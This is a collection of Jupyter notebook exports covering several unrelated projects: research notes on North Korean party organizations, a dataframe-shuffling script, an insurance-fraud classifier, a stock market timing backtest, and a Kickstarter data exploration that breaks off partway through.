1961년 4차 당대회에서 남한에서의 지하당 조직 확대와 통일전선 강화 등의 결정과 함께 내무성 등의 대남 공작기구를 통합해 중앙당 ‘연락국’을 신설했다. 1964년 2월 조선로동당 중앙위원회 4기 8차 전원회의에서 ‘3대 혁명력량 강화’노선을 채택하면서 종래의 연락국을 ‘대남사업총국’으로 개칭했다.\n# - 1966년 10월 12일 당 중앙위원회 4기 14차 전원회의에서 비서국이 신설되면서 대남사업담당비서 산하에 ‘연락부’, ‘문화부’, ‘조사부’, ‘인민무력부정착국’, ‘조총련’부서를 두었으며, 1978년 1월 통일전선부가, 1990년대 후반 35호실(대외정보조사부)과 작전부가 신설됨으로써 대남 담당 부서의 체계가 구축되었다. 남한 내 정당, 사회단체, 군부에 대한 공작 거점 및 공작 전술 연구개발 업무를 수행하고 있다. 특히 간첩교육과 파견을 직접 담당하고 있으며, 조총련에 대한 활동 지도도 담당하고 있다.\n# \n# - 내각 & 정무원\n# - How different was their organization?\n# - https://encykorea.aks.ac.kr/Article/E0066727 - Let's alias. It seems like the name simply changed from 내각 (1948) --> 정무원 (1972) --> 내각 (1998)\n# - Do we need to duplicate the entire 내각 structure for 정무원?\n# - At the very least, should we swap out 내각 for 정무원 in cases where data are labelled as 내각 but during 정무원 periods (pre-1998)?\n# - If the internal organization was quite similar, then maybe we could just alias 내각 and 정무원 and not worry about replicating the organization three\n# - 인도기관?\n# - 국방위원회\n# - 국무위원회\n# - resolve differences between InstitutionType, PrimaryInstitution, OrgName\n# - for PI=총참모부, rename PI=인민군, OrgName = 총참모부_; and remove duplicates. e.g., 총참모부_작전총국\n# - 노동당, 당중앙위원회\n# - many organizations for whom 중앙위원회 is their main leadership body\n# - 인민군. remove as PrimaryInstitution, and use as InstitutionType instead\n# - https://encykorea.aks.ac.kr/Article/E0066687\n# - 인민무력부, 인민무력성, \n# \t\t- PrimaryInstitutions\n# \t\t\t- 최고사령부\n# \t\t\t- 총참모부\n# \t\t\t- 주요 사령부\n# \t\t\t- 등\n# - Make sure X.0.0.0 positions are not being duplicated with X.1.0.0 positions, especially in the case of 중앙위원회\n# - Discuss X in PI_Index\n# - 비서국A --> 정무국 --> 비서국B\n# - check for duplicates: 당 비서국\n# - 당중앙위원회_정치위원회 (폐지) 직급\n# - 당중앙위원회_총정치국 - 당/인민군\n# - 당중앙위원회_조선혁명박물관당위원회 & other 1.1.X.0.0 - double-check if they are included in 외곽단 - InGov?\n# - Change_OrgName to 당중앙위원회_X\n# - 비서국_인민무력부B\n# - 비서국_인민무력부B_보위국\n# - 비서국_인민무력부B_작전국\n# - 비서국_인민무력부B_정치안전국\n#\n#\n#\n#\n\n# - Re-Index\n# - See PI-Index Coding Rules in Evernote\n# - Update X codes with 200 or 500. Delete any 200/500 which don't appear in our data. (They might have been orgs we corrected in the data.)\n# - 최고인민회의 X지역인민회의 - move from 200 Series to 0 Series\n# - Drop X지역위원회 and recode 200 Series to 0 Series\n# - Change coding of 당외곽 및 사회단체\n# - if the orgs were found in the 별책, then change their codes from 200 series to 100 series\n# - Match, rename and recode (from 500+ to 100+) 500 series 국제친선기관\n# - code data source rather than index\n#\n#\n\n# # Task 3. 
Add OrgType & other metadata\n#\n# - Add OrgType\n#\n\n# # Future Tasks\n#\n# - Future Integrity Checks & Data Cleaning\n# - Identify inconsistencies in Position Rankings (e.g., 명예위원장)\n# - Verify (PI, OrgName) not found in 기관별인명록\n# - Research X entries: e.g., 3.525.591: 내각_외무성_X국_대사관\n# - Reconcile 기관 across three categories: 기타기관, 당외곽및사회단체, 당외곽및사회단체(별책)\n# - Add more orgs\n# - Expand any X지역위원회 into full list\n# - 내각 - Level 2 or Level 3?\n# - orgs after 내각 국토환경보호성_산림총국\n# - orgs after 내각 대외경제성_민족경제협력위원회\n# - orgs after 내각 보건성_중앙의약품관리소\n# - orgs after 내 각 상업성_중앙도매소\n# - 내각 정보산업성 우편국, 전화국, 체신관리국, 체신소, \n# - 내각 (45)\n# - 당외곽및사회단체 (별책)\n# - - Discussion about matching levels\n# - https://namu.wiki/w/ - consider the OrgRang of 김정은의 겸직\n# \t\t- 조선민주주의인민공화국 국무위원회 위원장[국가원수]\n# \t\t- 조선로동당 중앙군사위원장\n# \t\t- 조선민주주의인민공화국무력 최고사령관\n# \t\t- 조선로동당 중앙위원회 정치국 상무위원\n\n\n","repo_name":"seouljake/nkelites","sub_path":"scripts/1 scripts - data cleaning and structuring/2 career/2.6.1.1 prep tables task 1_prep & merge mismatches.ipynb","file_name":"2.6.1.1 prep tables task 1_prep & merge mismatches.ipynb","file_ext":"py","file_size_in_byte":16848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"20301527419","text":"# # Randomized a Dataframe\n\n# +\n# we would use shuffle to randomize the data\nimport pandas as pd\nfrom random import shuffle\n\n\n# -\n\ndf = pd.read_csv('data/geography.csv',sep=\";\")\ndf.head()\n\n#shuffle to every column\nfor col in df.columns:\n columntoRandom = df[col]\n shuffle(columntoRandom)\n\n\n#check the resutls\ndf.head()\n\n#safe\ndf2_final.to_csv (r'data\\geography_randomice.csv',sep=\";\", index = None, header=True)\n\n# ### End\n","repo_name":"Enrique1987/python-data-analysis","sub_path":"Randomize_existing_Dataframe.ipynb","file_name":"Randomize_existing_Dataframe.ipynb","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"33971114806","text":"# # Insurance Claims- Fraud Detection\n#\n# Problem Statement:\n# Business case:\n# Insurance fraud is a huge problem in the industry. It's difficult to identify fraud claims. Machine Learning is in a unique position to help the Auto Insurance industry with this problem.\n#\n# In this project, you are provided a dataset which has the details of the insurance policy along with the customer details. It also has the details of the accident on the basis of which the claims have been made. \n#\n# In this example, you will be working with some auto insurance data to demonstrate how you can create a predictive model that predicts if an insurance claim is fraudulent or not. \n#\n# \n#\n# Note: Use the link below to reach to your dataset. 
\n#\n#\n# Downlaod Files:\n# https://github.com/dsrscientist/Data-Science-ML-Capstone-Projects/blob/master/Automobile_insurance_fraud.csv\n\n# +\n#Importing required packages & libraries.\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# %matplotlib inline\nimport warnings\nwarnings.filterwarnings('ignore')\n# -\n\n#Loading the dataset\ndf=pd.read_csv(\"https://raw.githubusercontent.com/dsrscientist/Data-Science-ML-Capstone-Projects/master/Automobile_insurance_fraud.csv\") \n\n#printing the dataset\ndf\n\n#printing the dataset\ndf.shape\n\n# We can see there are 1000 rows and 40 columns in the dataset.\n\n#checking for null values\ndf.isna().sum()\n\n# We can see there are no null values in the data. That's some good news to proceed further.\n\n# checking the statistical details of dataset\ndf.describe()\n\n# Here we can see that the '_c39' column all has NaN values to we will drop it. We also see that there are null in collision_type, property_damage and police_report_available columns. So, we will fill them using appropriate method. \n\n# Dropping columns \ndf2=df.drop('_c39',axis=1,inplace=True)\n\n#checking the dataset after removing the '_c39' column\ndf\n\ndf.isna().sum()\n\n# Now, the dataset looks good! \n\n#checking unique values\ndf.nunique()\n\n# Here we can see a no. of columns that are not required for our prediction. So, we will consider dropping the columns. \n\n# +\n# dropping columns which are not necessary for prediction\n\nto_drop = ['policy_number','policy_bind_date','policy_state','insured_zip','incident_location','incident_date',\n 'incident_state','incident_city','insured_hobbies','auto_make','auto_model','auto_year']\n\ndf.drop(to_drop, inplace = True, axis = 1)\n# -\n\n#checking dataset after dropping columns\ndf.head()\n\n# +\n# checking for multicollinearity\n\nplt.figure(figsize = (18, 12))\n\ncorr = df.corr()\nmask = np.triu(np.ones_like(corr, dtype = bool))\n\nsns.heatmap(data = corr, mask = mask, annot = True, fmt = '.2g', linewidth = 1)\nplt.show()\n# -\n\n# From the above plot, we can see that there is high correlation between age and months_as_customer.We will drop the \"age\" column. Also there is high correlation between total_clam_amount, injury_claim, property_claim, vehicle_claim as total_claim_amount is the sum of all others. So, we will drop total_claim_amount column.\n\ndf.drop(columns = ['age', 'total_claim_amount'], inplace = True, axis = 1)\n\ndf.head()\n\n#checking details information of dataset\ndf.info()\n\n# Our data looks in good shape now. so, we may proceed further by seperating the feature and the target columns to prepare it for model building.\n\n# +\n# separating the feature and target columns\n\nX = df.drop('fraud_reported', axis = 1)\ny = df['fraud_reported']\n# -\n\n# extracting categorical columns\ncat_df = X.select_dtypes(include = ['object'])\n\ncat_df.head()\n\n# printing unique values of each column\nfor col in cat_df.columns:\n print(f\"{col}: \\n{cat_df[col].unique()}\\n\")\n\n# We can see that are certain cells that have ? instead of a value in the property_damage, police_report_available and collision_type column. 
we will replace it with a \"Not Known\"\n\n# this will replace \"?\" with \"Not known\"\ncat_df.replace(to_replace=\"?\",\n value=\"Not known\")\n\n# We will now use One Hot Encoder to encode these categorical columns.\n\n#Applying One Hot Encoder\ncat_df = pd.get_dummies(cat_df, drop_first = True)\n\n#printing head after encoding\ncat_df.head()\n\n# We will also extract the numerical data. \n\n# extracting the numerical columns\nnum_df = X.select_dtypes(include = ['int64'])\n\nnum_df.head()\n\n# combining the Numerical and Categorical dataframes to get the final dataset\nX = pd.concat([num_df, cat_df], axis = 1)\n\nX.head()\n\n# We will now visualize the data. \n\n# +\nplt.figure(figsize = (25, 20))\nplotnumber = 1\n\nfor col in X.columns:\n if plotnumber <= 24:\n ax = plt.subplot(5, 5, plotnumber)\n sns.distplot(X[col])\n plt.xlabel(col, fontsize = 15)\n \n plotnumber += 1\n \nplt.tight_layout()\nplt.show()\n# -\n\n# Data looks good, let's check for outliers.\n\n# +\nplt.figure(figsize = (20, 15))\nplotnumber = 1\n\nfor col in X.columns:\n if plotnumber <= 24:\n ax = plt.subplot(5, 5, plotnumber)\n sns.boxplot(X[col])\n plt.xlabel(col, fontsize = 15)\n \n plotnumber += 1\nplt.tight_layout()\nplt.show()\n# -\n\n# We do see that outliers are present in some numerical columns we will scale numerical columns later.\n\n# +\n# splitting data into training set and test set\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25)\n# -\n\nX_train.head()\n\nnum_df = X_train[['months_as_customer', 'policy_deductable', 'umbrella_limit',\n 'capital-gains', 'capital-loss', 'incident_hour_of_the_day',\n 'number_of_vehicles_involved', 'bodily_injuries', 'witnesses', 'injury_claim', 'property_claim',\n 'vehicle_claim']]\n\n# +\n# Scaling the numeric values in the dataset\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nscaled_data = scaler.fit_transform(num_df)\n# -\n\nscaled_num_df = pd.DataFrame(data = scaled_data, columns = num_df.columns, index = X_train.index)\nscaled_num_df.head()\n\nX_train.drop(columns = scaled_num_df.columns, inplace = True)\n\nX_train = pd.concat([scaled_num_df, X_train], axis = 1)\n\nX_train.head()\n\n# Now, our data is ready for model building. Let's get started. 
\n\n# +\nfrom sklearn.svm import SVC\n\nsvc = SVC()\nsvc.fit(X_train, y_train)\n\ny_pred = svc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nsvc_train_acc = accuracy_score(y_train, svc.predict(X_train))\nsvc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Support Vector Classifier is : {svc_train_acc}\")\nprint(f\"Test accuracy of Support Vector Classifier is : {svc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# SVC presents a training accuracy of 84% and testing accuracy of 76%.\n\n# +\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = KNeighborsClassifier(n_neighbors = 30)\nknn.fit(X_train, y_train)\n\ny_pred = knn.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nknn_train_acc = accuracy_score(y_train, knn.predict(X_train))\nknn_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of KNN is : {knn_train_acc}\")\nprint(f\"Test accuracy of KNN is : {knn_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# KNN presents a training accuracy of 76% and testing accuracy of 72%.\n\n# +\nfrom sklearn.tree import DecisionTreeClassifier\n\ndtc = DecisionTreeClassifier()\ndtc.fit(X_train, y_train)\n\ny_pred = dtc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\ndtc_train_acc = accuracy_score(y_train, dtc.predict(X_train))\ndtc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Decision Tree is : {dtc_train_acc}\")\nprint(f\"Test accuracy of Decision Tree is : {dtc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n# +\n# hyper parameter tuning\n\nfrom sklearn.model_selection import GridSearchCV\n\ngrid_params = {\n 'criterion' : ['gini', 'entropy'],\n 'max_depth' : [3, 5, 7, 10],\n 'min_samples_split' : range(2, 10, 1),\n 'min_samples_leaf' : range(2, 10, 1)\n}\n\ngrid_search = GridSearchCV(dtc, grid_params, cv = 5, n_jobs = -1, verbose = 1)\ngrid_search.fit(X_train, y_train)\n\n# +\n# best parameters and best score\n\nprint(grid_search.best_params_)\nprint(grid_search.best_score_)\n\n# +\n# best estimator \n\ndtc = grid_search.best_estimator_\n\ny_pred = dtc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\ndtc_train_acc = accuracy_score(y_train, dtc.predict(X_train))\ndtc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Decision Tree is : {dtc_train_acc}\")\nprint(f\"Test accuracy of Decision Tree is : {dtc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# Decision Tree Classifier presents a training accuracy of 81% while testing accuracy of 80%.\n\n# +\nfrom sklearn.ensemble import RandomForestClassifier\n\nrand_clf = RandomForestClassifier(criterion= 'entropy', max_depth= 10, max_features= 'sqrt', min_samples_leaf= 1, min_samples_split= 3, n_estimators= 140)\nrand_clf.fit(X_train, y_train)\n\ny_pred = rand_clf.predict(X_test)\n\n# +\n# accuracy_score, 
confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nrand_clf_train_acc = accuracy_score(y_train, rand_clf.predict(X_train))\nrand_clf_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Random Forest is : {rand_clf_train_acc}\")\nprint(f\"Test accuracy of Random Forest is : {rand_clf_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# Random Forest Classifier presents a training accuracy of 96% while testing accuracy of only 70%.\n\n# +\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ngb = GradientBoostingClassifier()\ngb.fit(X_train, y_train)\n\n# accuracy score, confusion matrix and classification report of gradient boosting classifier\n\ngb_acc = accuracy_score(y_test, gb.predict(X_test))\n\nprint(f\"Training Accuracy of Gradient Boosting Classifier is {accuracy_score(y_train, gb.predict(X_train))}\")\nprint(f\"Test Accuracy of Gradient Boosting Classifier is {gb_acc} \\n\")\n\nprint(f\"Confusion Matrix :- \\n{confusion_matrix(y_test, gb.predict(X_test))}\\n\")\nprint(f\"Classification Report :- \\n {classification_report(y_test, gb.predict(X_test))}\")\n# -\n\n# Gradient Boosting Classifier presents a training accuracy of 93% while testing accuracy of only 48%.\n\n# +\nmodels = pd.DataFrame({\n 'Model' : ['SVC', 'KNN', 'Decision Tree', 'Random Forest', 'Gradient Boost'],\n 'Score' : [svc_test_acc, knn_test_acc, dtc_test_acc, rand_clf_test_acc, gb_acc]\n})\n\n\nmodels.sort_values(by = 'Score', ascending = False)\n# -\n\n# Thus, the above data demonstrates the accuracy scores of predictive models. We can see that Decision Tree Classifier has the highest accuracy score. We will save it as our final model.\n\n# +\nfrom joblib import Parallel, delayed\nimport joblib\n\n#Saving the best model\njoblib.dump(DecisionTreeClassifier, 'Insurance_Fraud_Detection.pkl')\n# -\n\n# We can see that most predictions made by major models indicate that the insurance claims are not fraud but genuine. However, there are some cases where fruadulent claims have also been made.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Debanti14/Datatrained-Practice_Projects","sub_path":"Insurance Claims- Fraud Detection.ipynb","file_name":"Insurance Claims- Fraud Detection.ipynb","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"12768685527","text":"# # Timing backtest with learning\n\n# +\n#hide \n# %load_ext autoreload\n# %autoreload 2\n# %matplotlib inline\n\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\nimport os \nimport subprocess\nfrom IPython.display import Image, display\n\nfrom skfin.plot import line, bar\n# -\n\n# In previous sections, we studied the predictability of industry and stock returns in a long-short \"cash-neutral\" setting. In this section, we shift to the predictability of a single asset (ie. 
the \"market\" as the S\\&P 500 US index).\n\n# ## Timing the market\n\n# To evaluate the out-of-sample predictability of a variable, Welch-Goyal (2008) compare two regressions:\n#\n# - conditional regression (based on the predictor)\n# - unconditional regression (based on a rolling mean)\n# - the comparison between the two regression provides a test of whether the predictor has any value.\n#\n#\n# Intuition\n#\n# - “low\" prices relative to dividends forecast higher subsequent returns\n# - other ratios (earnings, book value, moving average of past prices instead of dividends) should also work\n# - expected returns vary over the business cycle and higher risk premium required to get people to hold stocks at the bottom of a recession: dividend-price ratios can be interpreted a state-variable capturing business cycle risk\n#\n# Critical view\n#\n# - are the in-sample results robust out-of-sample?\n#\n#\n# Data\n#\n# - dividend price ratio (“d/p\"): difference between the log of dividends and the log of prices\n# - dividend yield (“d/y\"): difference between the log of dividends and the log of lagged prices\n# - percent equity issuing (“equis\"): ratio of equity issuing activity as a fraction of total issuing equity\n\n#hide \ndisplay(Image(\"images/gw_1.png\", width=500))\n\n#hide \ndisplay(Image(\"images/gw_2.png\",width=700))\n\n# Welch-Goyal summary: very little predictability and the oil shock 1974 important in explaining results in the literature.\n\n#hide \ndisplay(Image(\"images/gw_3.png\", width=500))\n\n# Campbell-Thompson: impose “sign-restrictions\"\n#\n# - “in practice, an investor would not use a perverse coefficient but would likely conclude that the coefficient is zero, in effect imposing prior knowledge on the output of the regression\" (p. 
1516)\n#\n# Sign restrictions\n#\n# - set the regression coefficient to zero whenever it has the \"wrong\" sign (different from the theoretically expected sign estimated over the sample)\n# - set the forecast equity premium to zero whenever it is negative\n\n# Summary: does dividend yield predict returns?\n#\n# - Yes: dividend yield is a strong predictor in the 1970s and 1980s (in-sample!)\n# - No: the relationship became weaker in the 1990s\n# - No: the statistical evidence is much weaker when adjusting for the fact that the regressors are highly persistent\n# - No: dividend yield is also a weak predictor out-of-sample, and rarely better than a moving average.\n#\n# Ways to improve predictability\n# - Impose restrictions on coefficients (Campbell and Thompson, 2005)\n\n# ## Data\n\n# The data provided by Amit Goyal on the S\\&P 500 is essentially identical to the one provided by Ken French.\n\nfrom skfin.datasets import load_ag_features, load_kf_returns\ndf = load_ag_features()[:'1999']\n\nret = load_kf_returns(filename='F-F_Research_Data_Factors')['Monthly'][:'1999']\n\ncorr_ = df[['CRSP_SPvw']].corrwith(ret.assign(Mkt = lambda x: x['Mkt-RF'] + x['RF'])['Mkt'])['CRSP_SPvw']\nprint(f'Correlation data Ken French/Amit Goyal:{corr_:.2f}')\n\nline({'Amit Goyal': df['CRSP_SPvw'], 'Ken French': ret.assign(Mkt = lambda x: x['Mkt-RF'] + x['RF'])['Mkt']/100}, cumsum=True)\n\n# ## Timing backtest\n\n# +\nfrom skfin.estimators import Ridge, RidgeCV\nfrom skfin.mv_estimators import TimingMeanVariance\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import TimeSeriesSplit\n\n# +\nstart_date = \"1945-01-01\"\ntest_size = 1\nparams = dict(max_train_size=36, test_size=test_size, gap=0)\nparams[\"n_splits\"] = 1 + len(ret[:'1999'].loc[start_date:]) // test_size\n\ncv = TimeSeriesSplit(**params)\n# -\n\ncols = ['D12', 'E12', 'b/m', 'tbl', 'AAA', 'BAA', 'lty', 'ntis', 'Rfree',\n 'infl', 'ltr', 'corpr', 'svar', 'csp']\nret_ = ret['Mkt-RF']\ntarget = ret_.values\nfeatures = df.loc[ret.index, cols].fillna(0).values\n\n# +\nm = make_pipeline(StandardScaler(), \n Ridge(), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\n_h = []\nfor train, test in cv.split(ret): \n m.fit(features[train], target[train])\n _h += [m.predict(features[test])]\n \nidx = ret.index[np.concatenate([test for _, test in cv.split(ret)])]\nh = pd.Series(np.concatenate(_h), index=idx)\npnl = h.shift(1).mul(ret_).dropna()\nline(pnl, cumsum=True)\n# -\n\n# We can plot the holdings and in this case, we see that the positions vary significantly and that there is a significant positive `tilt` (defined as the exponential average over the positions with a 252-day halflife). \n\nline({'holding': h, 'tilt': h.ewm(halflife=252).mean()})\n\n# Decomposing the pnl attributed to the `tilt` and the `timing` (defined as the difference between the positions and the `tilt`), we see that both contribute -- although the `timing` pnl has a lower sharpe ratio. \n\nline({'ALL': pnl, \n 'tilt': h.ewm(halflife=252).mean().shift(1).mul(ret_).dropna(), \n 'timing': h.sub(h.ewm(halflife=252).mean()).shift(1).mul(ret_).dropna()}, cumsum=True)\n\n# In what follows, we use the `Backtester` class with the timing pipeline.
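# (Added illustration; this is my own sketch, not skfin's actual implementation.) The last step of the pipeline above, TimingMeanVariance(a_min=-.25, a_max=.25), turns the Ridge return forecast into a bounded position. A rough sketch of what a rule of this kind typically does, assuming the forecast is scaled by a trailing risk estimate and clipped to the allowed band:\n\n# +\ndef timing_position_sketch(pred, past_returns, a_min=-0.25, a_max=0.25):\n    # scale the forecast by a trailing variance estimate, then clip to the band\n    risk = np.var(past_returns) if len(past_returns) > 1 else 1.0\n    raw = pred / risk if risk > 0 else 0.0\n    return float(np.clip(raw, a_min, a_max))\n\n# example with the objects defined above: the last 36 months of target returns\n# timing_position_sketch(0.5, target[-36:])\n# -\n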
\n\n# +\nfrom skfin.backtesting import Backtester\nestimator = make_pipeline(StandardScaler(), \n Ridge(), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\nm = Backtester(estimator=estimator, ret=ret_)\nm.train(features, target)\n\nh.equals(m.h_), pnl.equals(m.pnl_)\n# -\n\n# ## Other timing backtest statistics\n\ncoef = pd.DataFrame([m_.steps[1][1].coef_ for m_ in m.estimators_], columns=cols, index=m.h_.index)\nline(coef, title='Ridge coefficient')\n\nfrom skfin.metrics import sharpe_ratio\n\nsr = {i: m.h_.shift(1+i).mul(ret_).pipe(sharpe_ratio) for i in range(-10, 12)}\nbar(sr, baseline=0, sort=False, title='Lead-lag sharpe ratio')\n\npnls_ = {}\nfor c in cols + ['ALL']:\n features_ = df.loc[ret.index].drop(c, axis=1, errors='ignore').fillna(0).values\n pnls_[c] = Backtester(estimator=estimator, ret=ret_).train(features_, target).pnl_\nline(pnls_, cumsum=True, title='Feature off the top')\n\npnls_ = {}\nfor alpha in [.1, 1, 10, 100, 1000]: \n estimator_ = make_pipeline(StandardScaler(), \n Ridge(alpha=alpha), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n pnls_[alpha] = Backtester(estimator=estimator_, ret=ret_).train(features, target).pnl_\nline(pnls_, cumsum=True, title='Robustness: ridge alpha')\n\n# +\nestimator_ = make_pipeline(StandardScaler(), \n RidgeCV(alphas=[1, 10, 100, 1000]), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\nm_ = Backtester(estimator=estimator_, ret=ret_)\nm_.train(features, target)\nline({'ridge': m.pnl_, 'ridgeCV': m_.pnl_}, cumsum=True, title='Robustness: estimator')\n# -\n\n# The following graph shows the regularization paramter `alpha` estimated by cross-validation by the `RidgeCV` estimator. \n\nalpha = pd.Series([m_.steps[1][1].alpha_ for m_ in m_.estimators_], index=m_.h_.index)\nline(alpha, legend=False, title='RidgeCV alpha')\n","repo_name":"schampon/skfin","sub_path":"nbs/41_Timing_backtest_with_learning.ipynb","file_name":"41_Timing_backtest_with_learning.ipynb","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"687712532","text":"# + [markdown] _uuid=\"72dcbdf719252ad310c9296cd157cc1f2e36c677\"\n# # Exploration of Kickstarter Data (2010-2017) (Work in progress)\n\n# + [markdown] _uuid=\"0b20cea833fb1aa456c0bfcd6a027a7b8b1b3c23\"\n# [Mickaël Mouillé](https://www.kaggle.com/kemical) posted this dataset online. \n#\n# You can check out the dataset [here](https://www.kaggle.com/kemical/kickstarter-projects).\n\n# + [markdown] _uuid=\"ddef2473b24040a41b9dacd93104590d7a496a6f\"\n# ![kickstarter](https://webby-gallery-production.s3.amazonaws.com/uploads/asset/image/15962/3018000000130981_large.jpg)\n\n# + [markdown] _uuid=\"e7bdbd58725a1ba28e7cf8be1e89cd613d308ecb\"\n# ## Features\n\n# + [markdown] _uuid=\"98d879f5ca03f117fee40f1b862b05d333c447ff\"\n# We have 15 initial features:\n# * ID: internal kickstarter id\n# * name: name of project - A project is a finite work with a clear goal that you’d like to bring to life. 
Think albums, books, or films.\n# * category: category\n# * main_category: category of campaign\n# * currency: currency used to support\n# * deadline: deadline for crowdfunding\n# * goal: fundraising goal - The funding goal is the amount of money that a creator needs to complete their project.\n# * launched: date launched\n# * pledged: amount pledged by \"crowd\"\n# * state: Current condition the project is in\n# * backers: number of backers\n# * country: country pledged from\n# * usd pledged: Pledged amount in USD (conversion made by KS)\n# * usd_pledged_real: Pledged amount in USD (conversion made by fixer.io api)\n# * usd_goal_real: Goal amount in USD (conversion made by fixer.io api)\n\n# + [markdown] _uuid=\"0d340725172bd830d572b1d6cfdef267d69da52d\"\n# ## Initial Exploration\n\n# + _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\" _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\"\n# Import dependencies\nimport numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# + _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\" _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\"\n# Load in dataset\nKAGGLE_DIR = '../input/'\n# There were some issues with the encoding so we manually set it to 'latin1'\ndf = pd.read_csv(KAGGLE_DIR + 'ks-projects-201801.csv', encoding='latin1', low_memory=False)\n\n# + _uuid=\"85178a73c54ca7a684553ae33c1177e3f4bdf3fa\"\ndisplay(df.shape)\n\n# + _uuid=\"58ca2b336f13b6273a1fa6b91cda5d5bee79ac89\"\nprint('First 5 rows:')\ndisplay(df.head())\n\nprint('Last 5 rows:')\ndisplay(df.tail())\n\n# + _uuid=\"808909fe16e955f5bf1dcbeb58a886b4acb2bde6\"\ndf.info()\n\n# + [markdown] _uuid=\"9f7dceac0f16787802f80e198eaf7b9c149bbaad\"\n# ## Missing Values\n\n# + [markdown] _uuid=\"b8d797256ac47791fbf8ec2b1bfebf134b4f22ba\"\n# Let's see how many missing values we have in our DataFrame\n\n# + _uuid=\"2a63be8edd21bf375afe40f06d794421f9edf2e9\"\npercent_missing = (df.isnull().sum() * 100 / len(df)).round(2)\nmissing_value_df = pd.DataFrame({'column_name': df.columns,\n 'percent_missing': percent_missing})\nmissing_value_df.sort_values('percent_missing', ascending=False, inplace=True)\nmissing_value_df\n\n# + [markdown] _uuid=\"e65a80c7bd46c6756b3a89dd829b113b491002a1\"\n# Fortunately, there are not many missing values. Let's see what kind of project contain missing values.\n\n# + _uuid=\"cee9084ad781048e17363dc7d850896085bd02cd\"\ndisplay(df[df['usd pledged'].isnull()].shape)\n# First 20 columns\ndf[df['usd pledged'].isnull()].head(20)\n\n# + [markdown] _uuid=\"2f5fd591c7f327ed08022c4234691fd5d41834ac\"\n# We can fill the missing values with the values from 'usd_plegded_real'. This should still give us reliable results.\n\n# + _uuid=\"0589eb0bb8e2344106d4f8e58aeec99c0272231b\"\ndf['usd pledged'].fillna(df['usd_pledged_real'], inplace=True)\n\n# + [markdown] _uuid=\"a24cbd6067cac73b593b780d9669d9cc22eb0cb6\"\n# It looks like 'usd pledged' and 'usd_pledged_real' are the same. Let's check if this is so.\n\n# + _uuid=\"65398743a8cd52e46924da013abc0fed4d7fc1c7\"\nduplication = df.duplicated(['usd pledged', 'usd_pledged_real'])\ndup_count = 0\nfor row in duplication:\n if row == True:\n dup_count += 1\n \n# Duplications percentage\nprint('Duplicates between USD Pledged and USD Pledged Real: {} %'.format(round(dup_count / len(df) * 100, 2)))\n\n# + [markdown] _uuid=\"4354d1724ac84ecbfb550faad3e7f350a8c33cad\"\n# So the two features have a lot of overlap, but are not exactly the same. 
